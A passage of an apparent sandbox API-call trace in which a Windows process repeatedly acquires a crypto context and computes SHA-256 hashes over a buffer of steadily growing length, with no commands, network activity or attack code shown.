(HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4ba80 [0119.621] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4ba80, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4ba80, pdwDataLen=0xce59c) returned 1 [0119.621] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.621] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.621] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.621] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.621] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0119.621] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.621] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4b780 [0119.621] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4b780, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4b780, pdwDataLen=0xce59c) returned 1 [0119.621] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.621] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.621] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.622] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.622] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0119.622] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.622] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4bab0 [0119.622] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bab0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bab0, pdwDataLen=0xce59c) returned 1 [0119.622] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.622] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.622] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.623] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.623] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0119.623] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.623] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4b7b0 [0119.623] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4b7b0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4b7b0, pdwDataLen=0xce59c) returned 1 [0119.623] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.623] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.623] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.623] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.623] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x700, dwFlags=0x0) returned 1 [0119.623] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.623] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4b7e0 [0119.624] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4b7e0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4b7e0, pdwDataLen=0xce59c) returned 1 [0119.624] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.624] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.624] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.624] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.624] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x720, dwFlags=0x0) returned 1 [0119.624] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.624] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4bb40 [0119.624] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bb40, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bb40, pdwDataLen=0xce59c) returned 1 [0119.624] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.624] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.624] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.625] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.625] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x740, dwFlags=0x0) returned 1 [0119.625] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.625] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4b810 [0119.625] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4b810, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4b810, pdwDataLen=0xce59c) returned 1 [0119.625] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.625] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.625] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.626] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.626] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x760, dwFlags=0x0) returned 1 [0119.626] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.626] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4b840 [0119.626] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4b840, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4b840, pdwDataLen=0xce59c) returned 1 [0119.626] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.626] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.626] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.626] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.626] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x780, dwFlags=0x0) returned 1 [0119.626] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.626] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4bb10 [0119.626] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bb10, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bb10, pdwDataLen=0xce59c) returned 1 [0119.626] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.626] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.626] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.627] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.627] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0119.627] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.627] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4b870 [0119.627] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4b870, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4b870, pdwDataLen=0xce59c) returned 1 [0119.627] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.627] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.627] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.628] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.628] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0119.628] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.628] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4bba0 [0119.628] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bba0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bba0, pdwDataLen=0xce59c) returned 1 [0119.628] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.628] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.628] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.628] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.628] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0119.628] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.628] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4b8a0 [0119.628] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4b8a0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4b8a0, pdwDataLen=0xce59c) returned 1 [0119.629] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.629] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.629] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.629] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.629] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x800, dwFlags=0x0) returned 1 [0119.629] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.629] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4b8d0 [0119.629] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4b8d0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4b8d0, pdwDataLen=0xce59c) returned 1 [0119.629] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.629] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.629] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.630] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.630] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x820, dwFlags=0x0) returned 1 [0119.630] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.630] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4bae0 [0119.630] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bae0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bae0, pdwDataLen=0xce59c) returned 1 [0119.630] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.630] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.630] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.631] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.631] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x840, dwFlags=0x0) returned 1 [0119.631] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.631] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4bb70 [0119.631] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bb70, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bb70, pdwDataLen=0xce59c) returned 1 [0119.631] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.631] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.631] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.631] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.631] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x860, dwFlags=0x0) returned 1 [0119.631] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.631] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4bbd0 [0119.631] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bbd0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bbd0, pdwDataLen=0xce59c) returned 1 [0119.631] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.631] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.631] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.632] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.632] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x880, dwFlags=0x0) returned 1 [0119.632] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.632] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4bc00 [0119.632] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bc00, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bc00, pdwDataLen=0xce59c) returned 1 [0119.632] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.632] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.632] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.633] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.633] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0119.633] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.633] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4bc30 [0119.633] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bc30, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bc30, pdwDataLen=0xce59c) returned 1 [0119.633] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.633] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.633] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.633] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.633] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0119.633] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.633] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4bcc0 [0119.634] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bcc0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bcc0, pdwDataLen=0xce59c) returned 1 [0119.634] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.634] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.634] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.634] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.634] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0119.634] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.634] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c5c0 [0119.634] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c5c0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c5c0, pdwDataLen=0xce59c) returned 1 [0119.634] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.634] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.634] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.635] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.635] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x900, dwFlags=0x0) returned 1 [0119.635] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.635] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c260 [0119.635] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c260, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c260, pdwDataLen=0xce59c) returned 1 [0119.635] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.635] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.635] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.636] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.636] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x920, dwFlags=0x0) returned 1 [0119.636] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.636] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c8c0 [0119.636] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c8c0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c8c0, pdwDataLen=0xce59c) returned 1 [0119.636] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.636] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.636] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.636] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.636] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x940, dwFlags=0x0) returned 1 [0119.636] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.636] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c560 [0119.636] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c560, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c560, pdwDataLen=0xce59c) returned 1 [0119.636] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.636] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.636] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.637] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.637] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x960, dwFlags=0x0) returned 1 [0119.637] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.637] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c200 [0119.637] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c200, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c200, pdwDataLen=0xce59c) returned 1 [0119.637] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.637] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.637] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.638] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.638] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x980, dwFlags=0x0) returned 1 [0119.638] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.638] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c530 [0119.638] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c530, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c530, pdwDataLen=0xce59c) returned 1 [0119.638] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.638] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.638] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.638] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.638] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0119.638] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.638] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4c2f0 [0119.638] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4c2f0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4c2f0, pdwDataLen=0xce59c) returned 1 [0119.638] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.638] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.638] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.639] CryptCreateHash (in: hProv=0x72b850, 